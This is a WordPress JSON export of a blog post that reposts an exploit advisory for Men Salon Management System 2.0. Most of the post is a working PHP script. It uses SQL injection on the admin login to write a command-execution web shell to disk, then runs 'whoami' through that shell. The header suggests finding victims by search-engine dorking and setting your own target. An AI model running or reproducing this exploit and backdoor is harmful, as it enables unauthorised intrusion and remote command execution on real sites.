{"id":59708,"date":"2024-09-13T19:50:08","date_gmt":"2024-09-13T16:50:08","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181510\/msms20-inject.txt"},"modified":"2024-09-13T19:50:08","modified_gmt":"2024-09-13T16:50:08","slug":"men-salon-management-system-2-0-php-code-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/men-salon-management-system-2-0-php-code-injection\/","title":{"rendered":"Men Salon Management System 2.0 PHP Code Injection"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : Men Salon Management System 2.0 php code injection Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 130.0.0 (64 bits) |<br \/>| # Vendor : https:\/\/phpgurukul.com\/men-salon-management-system-using-php-and-mysql\/ |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] This payload inject php code contains a back door.<\/p>\n[+] Line 16 + 19 Set your Target.<\/p>\n[+] save payload as poc.php<\/p>\n[+] usage from cmd : C:\\www\\test&gt;php 1.php<\/p>\n[+] payload :<\/p>\n<p>&lt;?php<br \/>\/\/ \u0627\u0644\u0645\u0643\u062a\u0628\u0627\u062a \u0627\u0644\u0645\u0637\u0644\u0648\u0628\u0629<br \/>function send_request($url, $data) {<br \/>$options = [<br \/>&#8216;http&#8217; =&gt; [<br \/>&#8216;header&#8217; =&gt; &#8220;Content-Type: application\/x-www-form-urlencoded\\r\\n&#8221;,<br \/>&#8216;method&#8217; =&gt; &#8216;POST&#8217;,<br \/>&#8216;content&#8217; =&gt; http_build_query($data),<br \/>]];<br \/>$context = stream_context_create($options);<br \/>return file_get_contents($url, false, $context);<br \/>}<\/p>\n<p>\/\/ \u062a\u062d\u062f\u064a\u062f URL \u062b\u0627\u0628\u062a<br \/>$url = &#8216;http:\/\/localhost\/msms\/&#8217;;<\/p>\n<p>\/\/ \u0645\u0633\u0627\u0631 \u062b\u0627\u0628\u062a \u0644\u0631\u0641\u0639 \u0627\u0644\u0645\u0644\u0641<br \/>$path = &#8216;C:\\www\\msms\\uploaded.php&#8217;;<br \/>$path = str_replace(&#8220;\\\\&#8221;, &#8220;\\\\\\\\&#8221;, $path);<\/p>\n<p>\/\/ \u062d\u0645\u0648\u0644\u0629 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a<br \/>$backdoor_payload = &#8216;&lt;?php if (isset($_GET[&#8220;cmd&#8221;])) { system($_GET[&#8220;cmd&#8221;]); } ?&gt;&#8217;;<\/p>\n<p>\/\/ \u0625\u0631\u0633\u0627\u0644 \u0645\u0644\u0641 PHP \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a<br \/>$payload = [<br \/>&#8216;username&#8217; =&gt; &#8220;admin&#8217; union select &#8216;&#8221; . addslashes($backdoor_payload) . &#8220;&#8216; into outfile &#8216;&#8221; . $path . &#8220;&#8216; &#8212; &#8216;a&#8221;,<br \/>&#8216;password&#8217; =&gt; &#8216;test&#8217;,<br \/>&#8216;login&#8217; =&gt; &#8221;<br \/>];<br \/>send_request($url . &#8220;admin\/index.php&#8221;, $payload);<\/p>\n<p>echo &#8220;[+] PHP backdoor uploaded successfully at $path\\n&#8221;;<\/p>\n<p>\/\/ \u062a\u0646\u0641\u064a\u0630 \u0645\u0644\u0641 PHP \u0627\u0644\u0645\u0631\u0641\u0648\u0639 \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a<br \/>$response = file_get_contents($url . &#8220;uploaded.php?cmd=whoami&#8221;);<br \/>echo &#8220;[+] Response from the backdoor (executing &#8216;whoami&#8217;): \\n$response\\n&#8221;;<br \/>?&gt;<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : Men Salon Management System 2.0 php code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https:\/\/phpgurukul.com\/men-salon-management-system-using-php-and-mysql\/ |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This payload inject php &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59708","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59708","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59708"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59708\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59708"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59708"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59708"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}